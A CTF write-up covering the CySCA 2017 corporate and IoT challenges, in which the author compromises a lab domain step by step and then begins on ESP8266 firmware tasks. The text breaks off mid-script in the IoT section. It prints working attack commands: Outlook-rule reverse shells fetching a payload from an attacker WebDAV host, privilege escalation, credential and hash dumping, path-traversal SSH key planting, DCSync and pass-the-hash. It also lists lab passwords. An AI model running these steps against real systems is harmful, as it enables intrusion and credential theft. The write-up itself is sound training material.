CySCA 2017 Corporate and IoT Challenges

I had the privilege of testing the challenges written for CySCA 2017, and I thank the challenge creators for allowing me to test them and learn from them.
Here, I will show my write-up for the Corporate and IoT challenges which I found really interesting. I hope you enjoy!
CySCA 2017 Corporate Challenges
Challenge 1: you've been srved
Usually, the corporate challenges give you a domain name and put you inside the corporate network. In our case, the domain name is tictoc.cysca
For the first challenge, we get a clue from the name of the challenge and realise that we have to do some DNS enumeration to get SRV records.
# nslookup -type=soa tictoc.cysca
Non-authoritative answer:
origin = ns.tictoc.cysca
mail addr = admin.tictoc.cysca
serial = 2017020402
refresh = 28800
retry = 7200
expire = 864000
minimum = 86400
Authoritative answers can be found from:
tictoc.cysca nameserver = ns.tictoc.cysca.
Getting the Start of Authority information from the DNS server, we find out that the nameserver used by tictoc.cysca is ns.tictoc.cysca
We can then use dig AXFR to do a DNS zone transfer and get all the information from the DNS server:
# host -t axfr tictoc.cysca
Trying "tictoc.cysca"
Using domain server:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24562
;; flags: qr aa ra; QUERY: 1, ANSWER: 12, AUTHORITY: 0, ADDITIONAL: 0
;tictoc.cysca. IN AXFR
tictoc.cysca. 86400 IN SOA ns.tictoc.cysca. admin.tictoc.cysca. 2017020402 28800 7200 864000 86400
tictoc.cysca. 86400 IN NS ns.tictoc.cysca.
tictoc.cysca. 86400 IN A
tictoc.cysca. 86400 IN MX 0 mail.tictoc.cysca.
_flag._udp.tictoc.cysca. 300 IN SRV 10 10 34532 axfrflag.tictoc.cysca.
autodiscover.tictoc.cysca. 300 IN A
axfrflag.tictoc.cysca. 300 IN A
ftp.tictoc.cysca. 300 IN A
mail.tictoc.cysca. 300 IN A
ns.tictoc.cysca. 300 IN A
www.tictoc.cysca. 300 IN A
tictoc.cysca. 86400 IN SOA ns.tictoc.cysca. admin.tictoc.cysca. 2017020402 28800 7200 864000 86400
Received 331 bytes from in 165 ms
Using AXFR, we get the AXFR flag in a SRV record
Challenge 2: Cumulonimbus
In this challenge, we are asked to look first at the FTP server (shown at ftp.tictoc.cysca in the DNS records). So let's use an anonymous connection to the FTP server:
# ftp
Connected to
220-# _____ _ ________ __ ___ #
220-# |_ _| |/ _/_ _/__\ / _/ #
220-# | | | | \__ | || \/ | \__ #
220-# |_| |_|\__/ |_| \__/ \__/ #
220-# ___ _____ ___ __ ___ ___ _ _ ___ ___ #
220-# | __|_ _| _,\ /' _/| __| _ \| \ / || __| _ \ #
220-# | _| | | | v_/ `._`.| _|| v /`\ V /'| _|| v / #
220-# |_| |_| |_| |___/|___|_|_\ \_/ |___|_|_\ #
220-# #
220-# #####! Do not abuse this service !##### #
220-# #####! all usage is monitored! !##### #
220-# #
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (172,16,5,103,255,49).
150 Here comes the directory listing.
drwxrwx--- 2 ftp ftp 4096 Feb 15 14:18 Documents
drwxrwxr-- 7 ftp ftp 4096 Feb 15 10:27 IDE
drwxrwxr-- 2 ftp ftp 4096 Jan 13 15:26 Printing
drwxrwxr-- 10 ftp ftp 4096 Mar 02 10:15 Software
drwxrwx--- 5 ftp ftp 4096 Mar 07 12:53 home
drwxrwxr-- 2 ftp ftp 4096 Jan 13 15:26 logs
drwxrwxr-- 2 ftp ftp 4096 Mar 06 17:03 tmp
226 Directory send OK.
Looking around on the FTP server, we find some interesting files, and download them onto our attacker machine:
ftp> cd Software
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (172,16,5,103,253,83).
150 Here comes the directory listing.
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:04 7-Zip
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:04 Audacity
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:02 GIMP
drwxr-xr-x 2 ftp ftp 4096 Feb 09 16:06 HxD
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:06 Notepad++
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:05 PuTTY
drwxr-xr-x 5 ftp ftp 4096 Feb 09 16:05 VLC
drwxr-xr-x 2 ftp ftp 4096 Feb 09 15:56 WinSCP
226 Directory send OK.
ftp> cd WinSCP
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (172,16,5,103,252,165).
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 282968 Feb 07 10:15
-rw-r--r-- 1 ftp ftp 18901720 Feb 07 10:15 WinSCP.exe
-rwxrwxrwx 1 ftp ftp 13854 Mar 02 10:19 WinSCP.ini
-rw-r--r-- 1 ftp ftp 37846 Feb 07 10:15 license.txt
-rw-r--r-- 1 ftp ftp 361 Feb 07 10:15 readme.txt
226 Directory send OK.
ftp> get WinSCP.ini
local: WinSCP.ini remote: WinSCP.ini
227 Entering Passive Mode (172,16,5,103,251,49).
150 Opening BINARY mode data connection for WinSCP.ini (13854 bytes).
226 Transfer complete.
13854 bytes received in 0.06 secs (225.3005 kB/s)
Note that WinSCP is a software used for securely copying files to and from file servers. If a user chooses to save their password when using the WinSCP software, their passwords may be stored obfuscated in the WinSCP.ini file.
Looking inside this file, we do see what looks like an obfuscated password:
# cat WinSCP.ini | grep -i password=
As WinSCP stores this password in a retrievable format, people have already made tools to decode these obfuscated values back to the original password. One such tool is winscppwd, which is described as "a simple commmand line tool to recover WinSCP stored passwords". We can run this tool in linux using Wine.
Using this tool, we recover the password:
# wine winscppwd.exe WinSCP.ini
Could not load wine-gecko. HTML rendering will be disabled.
Could not load wine-gecko. HTML rendering will be disabled.
wine: configuration in '/root/.wine' has been updated.
reading WinSCP.ini
[email protected] S0Str0ng!N0tFl@gTh0
Great! Looks like we got a password we can use for authenticating to the file server!
Using the username and password we now have, we SSH into the file server:
# ssh [email protected]
mctarget@ftp:~$ uname -a
Linux ftp 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
Our next step is to try and get root on this machine, so we enumerate it using common commands for finding privilege escalation vectors e.g. from g0tmi1k's blog. After some enumeration, we find some interesting output from sudo -l
mctarget@ftp:/var/ftproot$ sudo -l
Matching Defaults entries for mctarget on ftp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mctarget may run the following commands on ftp:
(root) /usr/bin/vi /var/ftproot/[A-Za-z0-9_-]*, !/usr/bin/vi */..*, !/usr/bin/vi /var/ftproot/, !/usr/bin/vi */., !/usr/bin/vi * *
Specifically, looks like our user, mctarget, is able to execute vi
as root on certain files. Additionally, there are some wildcards used to specify which files we can open with vi with root privileges. There are a few ways I can think of to use this configuration to allow us to privilege escalate:
- Open a file within
and then use:sh
to escape vi and get a shell as root - Creating a symlink to
, open it invi
, and then remove the password for the root user allowing us to login with a blank password - Use the above method but instead of removing the password, add a user to
Let's just use the simplest method, open a random file within /var/ftproot
, and then use :sh
to escape vi
mctarget@ftp:/var/ftproot$ sudo /usr/bin/vi /var/ftproot/testfile
root@ftp:/var/ftproot# id
uid=0(root) gid=0(root) groups=0(root),1001(ftpusers)
root@ftp:/var/ftproot# cd /root
root@ftp:~# cat flag.txt
And that's the flag for the second corporate challenge!
Challenge 3: Get the HASH find the Treasure MAPI
In this challenge, we are told that another user on the FTP server has a SMB file share mounted. Additionally, we have to compromise the mail server (also seen in the original DNS results as mail.tictoc.cysca).
We find an Outlook WebApp server running on the mail server at:
To get credentials for this server, we first look to confirm that an SMB connection is already established on the server:
root@ftp:/home/mctarget# netstat -antup | grep smbd
tcp 0 0* LISTEN 729/smbd
tcp 0 0* LISTEN 729/smbd
tcp 0 0 ESTABLISHED 878/smbd
tcp6 0 0 :::445 :::* LISTEN 729/smbd
tcp6 0 0 :::139 :::* LISTEN 729/smbd
We can see that a connection is established to!
Next, to dump SAMBA hashes locally on the FTP machine, we can use a tool called pdbedit as follows:
root@ftp:/home/mctarget# pdbedit -L -w
Note that pdbedit is an in-built samba tool to dump NT hashes, as mentioned here.
Now we have credentials for another user! Googling the user's hash or using john / hashcat to crack it, we find that the NT hash 2B2AC2D1C7C8FDA6CEA80B5FAD7563AA
maps to the password of computer
We can now use the credentials madisonw:computer
to login to OWA at
How can we use this access to get a shell or compromise the madisonw user?
Googling a bit on using outlook client access to gain a shell, we come across a nice blog article about Malicious Outlook Rules and we find a tool called ruler.
"Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely."
So, to summarise, we can use create a malicious outlook rule for the user to execute code / start an application on the user's machine. The attack involves starting a WebDAV server on our attacker machine to serve an executable or script, and a reverse shell listener. We use ruler to create a malicious outlook rule to fetch our reverse shell executable / script from our WebDAV server and then send an email to the user to trigger the rule.
So let's start Powershell Empire, set up a listener and create a batch script reverse shell:
root@kali:~/Empire# ./empire
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > set Host
(Empire: listeners) > set Port 8080
(Empire: listeners) > run
[*] Listener 'test' successfully started.
(Empire: listeners) > usestager launcher
(Empire: stager/launcher) > set Listener test
(Empire: stager/launcher) > execute
We create a shell.bat
file and include the contents above into it, and place it in the folder /root/Documents/CySCA/corporate/webdav-serve
. Next, we can use golang with the webdavserv.go
script provided by the creators of the ruler tool to start a WebDAV server as follows:
# go run webdavserv.go -d /root/Documents/CySCA/corporate/webdav-serve
Next, we can use the following code to display the current outlook rules of the user madisonw:
# ./ruler-linux64 --insecure --url https://autodiscover.tictoc.cysca/autodiscover/autodiscover.xml --username madisonw --password computer --email [email protected] display
Note that we guessed the autodiscover URL based upon examples provided on Ruler's github page. From this command, we see that there are currently no outlook rules for madisonw. Next, we can use the following command to create a malicious outlook rule:
# ./ruler-linux64 --insecure --url https://autodiscover.tictoc.cysca/autodiscover/autodiscover.xml --email [email protected] --username madisonw add --location "\\\\\\webdav\\shell.bat" --trigger "pop a bat shell" --name maliciousrule
In the above line, we add an outlook rule which, when triggered, will download shell.bat from our WebDAV server and execute it. We named our rule maliciousrule
and it will be triggered when madisonw receives an email with the subject of pop a bat shell
Now, we send an email to [email protected] from the OWA portal we are logged in to, with the subject of "pop a bat shell", and we receive an reverse connection:
(Empire: stager/launcher) > [+] Initial agent SDE3VALZ2GNZBZMT from now active
Great! We confirm our reverse shell as follows:
(Empire: stager/launcher) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
SDE3VALZ2GNZBZMT WORKSTATION TICTOC\madisonw powershell/3180 5/0.0 2017-04-15 13:10:15
(Empire: agents) > interact SDE3VALZ2GNZBZMT
(Empire: SDE3VALZ2GNZBZMT) > whoami
We fetch the flag from madison's Desktop as follows:
(Empire: SDE3VALZ2GNZBZMT) > pwd
(Empire: SDE3VALZ2GNZBZMT) > ls
LastWriteTime Length Name
------------- ------ ----
15/03/2017 1:37:34 PM 282 desktop.ini
13/04/2017 1:53:17 PM 38 flag.txt
3/03/2017 2:58:04 PM 2691 Outlook 2013.lnk
(Empire: SDE3VALZ2GNZBZMT) > cat flag.txt
There we go!
Challenge 4: SUbterfuge
This challenge asks us to get root on madisonw's machine.
We enumerate the machine looking for ways to escalate our privileges to Administrator. We could use scripts like PowerUp or JAWS to find vectors, however looking at some files on the filesystem showed us clues. Specifically, there was an AutoBackup folder in the root C:/ drive folder. This hints towards a backup script running automatically in the background, possibly in a scheduled task. Looking through the scheduled tasks on the machine, we find one interesting one:
(Empire: SDE3VALZ2GNZBZMT) > shell schtasks /Query /tn "Run Backup Madison" /V /fo LIST
Folder: \
TaskName: \Run Backup Madison
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 26/03/2017 4:19:50 PM
Last Result: 0
Author: WORKSTATION\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy unrestricted -WindowStyle Hidden -file "C:\AutoBackup\RunBackup.ps1"
Start In: C:\AutoBackup\
Comment: Run Automatic backup for Madison
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: madisonw
This scheduled task seems to execute a powershell script called RunBackup.ps1
in the AutoBackup folder, but it runs as the madisonw user. Let's have a look at this powershell script:
(Empire: SDE3VALZ2GNZBZMT) > cat RunBackup.ps1
#kill previous if running
Stop-Process -Name "Backup" -Force -ErrorAction SilentlyContinue
$content = "Backup script running as " + ([Environment]::UserName) + " at " + (Get-Date -Format g) + $OFS
$content >> "C:\AutoBackup\backup.log"
$ChkFile = "C:\AutoBackup\Backup.exe"
If ((Test-Path $ChkFile) -eq $True) {
If ((Get-Crc32($ChkFile)) -eq "0xCA1114C9"){
$content = "Backup Successful for " + ([Environment]::UserName) + " at " + (Get-Date -Format g) + $OFS
$content >> "C:\AutoBackup\backup.log"
Start-Process -FilePath $ChkFile -Wait
} else {
$content = "Backup.exe Checksum failed!!" + $OFS
$content >> "C:\AutoBackup\backup.log"
I cut off a majority of the script, and showed the main components. Specifically, you can see above that the PS1 script writes logs to backup.log in the same folder, looks for an executable at C:\AutoBackup\Backup.exe
, checks if the CRC32 of this file equals 0xCA1114C9
, and executes the file is the checksum matches.
Let's have a look at the backup logs:
(Empire: SDE3VALZ2GNZBZMT) > shell Get-Content backup.log | Select-Object -Last 10
Backup Successful for markmctarget at 16/04/2017 2:41 PM
Backup script running as markmctarget at 16/04/2017 2:42 PM
Backup Successful for markmctarget at 16/04/2017 2:42 PM
Backup script running as markmctarget at 16/04/2017 2:43 PM
Backup Successful for markmctarget at 16/04/2017 2:43 PM
Interestingly, we see that the backup script is actually being run by markmctarget! If we can somehow get our own code executed by this script, we can gain execution as markmctarget. So, let's use the cacls
command to see if we can edit the files in question. We have a look at the PS1 script but unfortunately find that it's not editable by our user. We then look at Backup.exe
and see the following:
(Empire: SDE3VALZ2GNZBZMT) > shell cacls Backup.exe
C:\AutoBackup\Backup.exe NT AUTHORITY\Authenticated Users:(ID)C
Here, we see that all users in the NT AUTHORITY\Authenticated Users
group have the ability to change the file. The output of cacls can be interpreted using the cacls documentation found here.
Great! So we can change the executable to our own executable. However, we still have to match the CRC32 check that is done in the PS1 script. Unfortunately we cannot remove this check from the PS1 script as we cannot change it, but we can write our own executable and somehow get its CRC32 value to match 0xCA1114C9
First, we can create our own malicious executable as follows:
# cat Dev-backup.c
#include <stdio.h>
#include <stdlib.h>
int main() {
int x = " + str(randomValue) + ";
return 0;
# i686-w64-mingw32-gcc Dev-Backup.c -o Backup.exe
In the above, we create a C script which will execute a batch script. We will eventually upload this shell.bat
to madisonw's Documents folder so that our malicious Backup.exe
can find it. Note that the compiler I used to compile the c script into an executable can be installed on Kali using apt-get install gcc-mingw-w64-i686
Googling for a way to change the file so that the CRC32 matches to a value of our choosing, we find the following article:
This article mentions a python script named
which takes in the CRC32 value you want to match and the byteoffset of 4 characters you are happy to change in your file. We run this python script as follows:
# python Backup.exe 2434 CA1114C9
Original CRC-32: 400B89A6
Computed and wrote patch
New CRC-32 successfully verified
Note that we picked a byteoffset of 2434 as the byte values at this location in the executable seemed like they did not affect the actual functionality of the executable. The original bytes of the executable were as follows:
# xxd -s 2434 Backup.exe | head
00000982: aaaa aaaa c704 2424 4040 00e8 1a11 0000 ......$$@@......
00000992: b800 0000 00c9 c390 9090 6690 6690 5383 ..........f.f.S.
000009a2: ec28 a1e4 5340 0089 0424 e87f 0400 0083 .(..S@...$......
000009b2: f8ff 8944 2418 0f84 8200 0000 c704 2408 ...D$.........$.
000009c2: 0000 00e8 4211 0000 a1e4 5340 0089 0424 ....B.....S@...$
000009d2: e859 0400 0089 4424 18a1 e053 4000 8904 .Y....D$...S@...
000009e2: 24e8 4804 0000 8944 241c 8d44 241c 8944 $.H....D$..D$..D
000009f2: 2408 8d44 2418 8944 2404 8b44 2430 8904 $..D$..D$..D$0..
00000a02: 24e8 3c11 0000 89c3 8b44 2418 8904 24e8 $.<......D$...$.
00000a12: 2a04 0000 a3e4 5340 008b 4424 1c89 0424 *[email protected]$...$
Anyway, now that we have our new Backup.exe
that matches the correct CRC32 value, we can upload it to the server and replace the executable in the AutoBackup folder. Remember to also upload our shell.bat powershell empire script also.
(Empire: SDE3VALZ2GNZBZMT) > pwd
(Empire: SDE3VALZ2GNZBZMT) > upload /root/Documents/CySCA/corporate/webdav-serve/webdav/shell.bat
(Empire: SDE3VALZ2GNZBZMT) > cd C:\AutoBackup
(Empire: SDE3VALZ2GNZBZMT) > upload /root/Documents/CySCA/corporate/subterfuge/Backup.exe
(Empire: SDE3VALZ2GNZBZMT) > [+] Initial agent 3ZMXB13RAYTAAPMS from now active
After a minute or so, we can see above that we receive another reverse shell! This time, we can see that it is a shell with Administrative privileges (as denoted by the asterisk in Powershell Empire):
(Empire: SDE3VALZ2GNZBZMT) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
SDE3VALZ2GNZBZMT WORKSTATION TICTOC\madisonw powershell/5464 5/0.0 2017-04-17 13:12:15
3ZMXB13RAYTAAPMS WORKSTATION *TICTOC\markmctargetpowershell/3864 5/0.0 2017-04-17 13:12:13
Now we can interact with this new agent, escalate our privileges to SYSTEM (as we have administrative privileges) and get the flag:
(Empire: agents) > interact 3ZMXB13RAYTAAPMS
(Empire: 3ZMXB13RAYTAAPMS) > usemodule privesc/getsystem
(Empire: privesc/getsystem) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: privesc/getsystem) >
Get-System completed
(Empire: agents) > interact 3ZMXB13RAYTAAPMS
(Empire: 3ZMXB13RAYTAAPMS) > ls
(Empire: 3ZMXB13RAYTAAPMS) >
LastWriteTime Length Name
------------- ------ ----
13/04/2017 1:53:17 PM 38 flag.txt
(Empire: 3ZMXB13RAYTAAPMS) > cat flag.txt
(Empire: 3ZMXB13RAYTAAPMS) >
There you go!
Challenge 5: Delta Factor
This challenge asks us to compromise the Backup server using our current access as markmctarget.
Currently, we have compromised markmctarget / madisonw's computer, but it is not directly accessible by our attacker machine. We can get a reverse shell, but we cannot hit services running on the machine such as RDP. Let's see how we can solve this problem later.
First, let's have a look around the box and enumerate a bit more. Powershell Empire provides modules for collection of data post exploitation. One such module is to collect browser data:
(Empire: collection/browser_data) > usemodule collection/browser_data
(Empire: collection/browser_data) > execute
Job started: Debug32_2ktyr
Browser User DataType Data
------- ---- -------- ----
IE markmctarget History https://autodiscover.tictoc.cysca/ecp/PersonalSettings/EditAccount.aspx?rfr=olk&chgPh...
IE markmctarget History
IE Administrator Bookmark
IE madisonw Bookmark
IE markmctarget Bookmark
Firefox markmctarget History http://backup.tictoc.cysca
Firefox markmctarget History
Firefox markmctarget History http://www.tictoc.cysca
Get-BrowserData completed!
From the results of this collection module, we can see that markmctarget visited backup.tictoc.cysca
and www.tictoc.cysca
We get the IP address of as backup.tictoc.cysca
(Empire: 3ZMXB13RAYTAAPMS) > shell nslookup backup.tictoc.cysca
Server: dc.tictoc.cysca
Name: backup.tictoc.cysca
Now, let's try to get on RDP on our compromised workstation and access the backup website from there.
The way I thought of doing this was to use meterpreter's portfwd
feature to forward the RDP port to my local attacker machine. So first, let's start a meterpreter listener:
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8081
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on
[*] Starting the payload handler...
[*] handling request from; (UUID: t9jtkiwp) Staging x86 payload (958531 bytes) ...
And then we can invoke shellcode and connect to this listener from our Empire agent as follows:
(Empire: collection/browser_data) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Lport 8081
(Empire: code_execution/invoke_shellcode) > set Lhost
(Empire: code_execution/invoke_shellcode) > execute
We then receive our meterpreter reverse shell:
[*] Meterpreter session 1 opened ( -> at 2017-04-18 22:00:52 +1000
meterpreter > getuid
Server username: TICTOC\markmctarget
Finally, we can setup a port forward to be able to access RDP directly from our attacker machine:
meterpreter > portfwd add -l 3389 -p 3389 -r
Now we use rdesktop
and the credentials TICTOC\madisonw:computer
to authenticate to the workstation. We can then open a browser and access http://backup.tictoc.cysca. Here, we are provided with a login page. We need to get credentials somehow. As we saw markmctarget access the backup website through firefox, maybe we can get browser credential data from firefox.
Researching online, we find a tool called LaZagne which "is an open source application used to retrieve lots of passwords stored on a local computer" including credentials from browsers. Let's go to the Releases page on this github, and get the laZagne.exe
file. We then upload it to markmctarget's workstation and execute it from Powershell Empire:
(Empire: actuallyMark32) > shell C:\Users\markmctarget\Documents\laZagne.exe browsers -f
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
########## User: markmctarget ##########
------------------- Firefox passwords -----------------
Password found !!!
URL: http://backup.tictoc.cysca
Login: markmctarget
Password: GOD
Alright! We now have credentials for http://backup.tictoc.cysca
To generate the TokenCode for the website we want to login to, we actually have to use python code provided within the SecurityToken
folder on markmctarget's Desktop. We setup the IoT device used in the IoT challenges with the password 2fa generating firmware found in this folder and then run python code on
to generate the security tokens.
Once logged in to the backup website, we are introduced to a website which allows us to upload a SSH public key to the authorized_keys
file for markmctarget. Let's play around with this website by port forwarding port 80 on the web server to our local attacker machine:
meterpreter > portfwd add -l 8082 -p 80 -r
Playing around with the web requests, we figure out that a cookie value is used to determine which folder the server looks into to add to the authorized_keys
file. We can change the cookie value to change the folder in which the authorized_keys
file is added to. So, as long as the web server has permissions to write to this file, we can add our SSH key to root's authorised_keys
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: csrftoken=90ZBvy5hp7dzi4lBRixLbEeB0CEaol7j; sessionid=tvtrso6pgaze51gp9h1fceqyavq98iqw; linuxgid=0; linuxuid=0; linuxuser=../root
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 477
Having changed the linuxuser variable to ../root
, our SSH public key gets added to root's authorized_keys
file, and we are then able to SSH to root on the backup server!
First, we port forward the SSH port on the backup server so that we can access it from our kali machine, and then we SSH using the private key that pairs with the public key we added above:
meterpreter > portfwd add -l 2222 -p 22 -r
root@kali:~# ssh [email protected] -p 2222
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Tue Apr 11 11:49:14 2017
root@BackupServer:~# id
uid=0(root) gid=0(root) groups=0(root)
root@BackupServer:~# uname -a
Linux BackupServer 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
root@BackupServer:~# cat flag.txt
Challenge 5 complete!
Challenge 6: 70's Chocolate
In this challenge, we are asked to compromise the DC server in the tictoc.cysca domain.
Looking around the backup server, we find a very interesting readme file in the /BACKUPS
root@BackupServer:/BACKUPS# cat readme
This folder contains the core file backups from the Domain Controllers.
This was setup in the event migration to a new Windows Server version Failed.
It looks like there are core Windows files stored in this Backups folder! We can use the following commands to copy the DC and BackupDC's SAM, SECURITY and SYSTEM files to our local kali machine:
# scp -P 2222 [email protected]:/BACKUPS/DC/SAM .
# scp -P 2222 [email protected]:/BACKUPS/DC/SECURITY .
# scp -P 2222 [email protected]:/BACKUPS/DC/SYSTEM .
# scp -P 2222 [email protected]:/BACKUPS/BackupDC/SAM .
# scp -P 2222 [email protected]:/BACKUPS/BackupDC/SECURITY .
# scp -P 2222 [email protected]:/BACKUPS/BackupDC/SYSTEM .
With these files, there are many tools to extract credentials including passwords and hashes from them. My favourite is Impacket's
which can be used as follows:
root@kali:~/Documents/CySCA/corporate/70schocolate/BackupDC# -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Target system bootKey: 0xc5c430dd324e865569b79dee6003caf2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
[*] Dumping LSA Secrets
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:0afd89a7c973d77553ff5b182db22554
We could try PTH or cracking the local SAM hashes, however the machine account credentials are very interesting! As we know these credentials came from a Backup DC server, it can be assumed that this Machine Account also has access to replicate Active Directory from the DC. Additionally, we know from previously running nslookup
commands that the IP address of the DC is
The blog post here talks about how we can use the machine account credentials to replicate AD. Amazingly, the same tool we used before can be used for this,
. However, we will need access to the SMB ports, 135 and 445, so that we can talk to the DC from our kali machine:
meterpreter > portfwd add -l 135 -p 135 -r
[*] Local TCP relay created: :135 <->
meterpreter > portfwd add -l 445 -p 445 -r
[*] Local TCP relay created: :445 <->
Next, we use
to replicate AD and download the hashes stored in it:
root@kali:~/Documents/CySCA/corporate/70schocolate/BackupDC# -hashes aad3b435b51404eeaad3b435b51404ee:0afd89a7c973d77553ff5b182db22554 -just-dc-ntlm TICTOC/BackupDC\[email protected]
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
I have cut out most of the output of this command as there were many, many more hashes in the output. The main one we care about, however, is the Administrator account for the tictoc.cysca domain.
As we still have our PowerShell Empire listener running, we can simply use metasploit's psexec_psh module to execute our Empire reverse shell payload:
msf exploit(handler) > use exploit/windows/smb/psexec_psh
msf exploit(psexec_psh) > set SMBPASS aad3b435b51404eeaad3b435b51404ee:0bcbdad17128326964ff65849559b685
msf exploit(psexec_psh) > set SMBUSER Administrator
msf exploit(psexec_psh) > set SMBDomain tictoc.cysca
msf exploit(psexec_psh) > set RHOST
msf exploit(psexec_psh) > set payload windows/exec
msf exploit(psexec_psh) > exploit
And we receive a shell on PowerShell Empire! It should be noted however that for some reason we receive a shell as SYSTEM rather than as Administrator:
(Empire: stager/launcher) > [+] Initial agent LTZHYN1FSPDX2FCL from now active
(Empire: stager/launcher) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
LTZHYN1FSPDX2FCL DC *TICTOC\SYSTEM powershell/8384 5/0.0 2017-04-20 21:56:28
As the flag for this challenge is only readable by Administrator, and not SYSTEM (the irony...), we have to impersonate the Administrator's token to read the flag. The way I did this was to first gain a meterpreter shell again, and then impersonate Administrator's token using a build in meterpreter command:
(Empire: code_execution/invoke_metasploitpayload) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Lport 8081
(Empire: code_execution/invoke_shellcode) > set Lhost
(Empire: code_execution/invoke_shellcode) > execute
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on
[*] Starting the payload handler...
[*] handling request from; (UUID: mvqhismu) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 2 opened ( -> at 2017-04-20 22:43:44 +1000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
IIS APPPOOL\DefaultAppPool
Window Manager\DWM-1
Impersonation Tokens Available
meterpreter > impersonate_token TICTOC\\Administrator
[+] Delegation token available
[+] Successfully impersonated user TICTOC\Administrator
meterpreter > getuid
Server username: TICTOC\Administrator
meterpreter > cd flag
meterpreter > cat flag.txt
We have successfully compromised the DC!
Challenge 7: Alone in the wilderness
Unfortunately I did not get to complete this one, but it looked like a buffer overflow + ret2libc challenge binary, with the server running on, port 31337.
Let's move on to the very interesting IoT challenges!
CySCA 2017 IoT Challenges
For these challenges, we are provided a physical ESP8266 microchip, with a Wi-fi module, a full TCP/IP stack and a microcontroller for executing code.
The ESP8266 microchip comes with a wi-fi module, so we can connect it to a wi-fi hotspot. Using a USB Wi-fi adapter I owned, I knew I could put my kali machine and the microchip on the same wi-fi network.
We connect the Wi-Fi usb adapter to the kali VM and set it up as hotspot (see this video for a guide). Then, we start the IoT device and connect to the hotspot with the credentials that we setup when creating the hotspot.
Challenge 1: Take a Peak
The first challenge was to dump the firmware from the device itself. This is quite simply with a tool called
. We connect the IoT device via USB to our kali VM and dump the firmware as follows:
root@kali:~/Documents/CySCA# --port /dev/ttyUSB0 read_flash 0 0x9a000 read_flash_output_0x9a000.bin
This reads from the offset of 0x9a000
and outputs the flash contents to a file called read_flash_output_0x9a000.bin
. Note that I had to have the device disconnected from screen
, and press the reset button on the device while the above command was running.
Challenge 2: Whoop Whoop Whoop
As we have the device connected to our Wi-fi hotspot, we can monitor the traffic that the device sends out using the adapter on the wi-fi network connected to our Kali VM.
Using Wireshark, we notice the following request coming from the IoT device:
POST /data HTTP/1.0
Host: tempsensor.cysca
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
POST /data HTTP/1.0
Host: tempsensor.cysca
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
In the above requests, we can see the traffic going to tempsensor.cysca
, and we notice some interesting parameters named signature
and data
With this challenge, we first used binwalk
to extract MicroPython scripts from the firmware we extracted, and then we changed the script to send a really high temperature in the data
field. The script included code to calculate the signature on the data automatically, and a request was sent to tempsensor.cysca
with a high temperature reading. The following screenshot shows the results on the tempsensor.cysca web server which was used for reporting of temperatures.
The error at the top of the page reveals the flag when a high temperature reading is sent to the server.
Challenge 3: In Certs we Trust
For the follwing challenges, we were provided with two extra pieces of firmware, one for a door lock and one for a door unlocker. We have to re-flash the IoT device with new firmware and analyse the differences between these two firmware.
First, we look at the door lock. Once re-flashed with the door unlocker firmware, we use
to dump the firmware again, and run it through binwalk
In the binwalk
output, I found a .cer
file, a .key
file, and the following python script:
# cat
import uhashlib
import ubinascii
def genpw(mac,username):
mac = mac.upper()
username = username.upper()
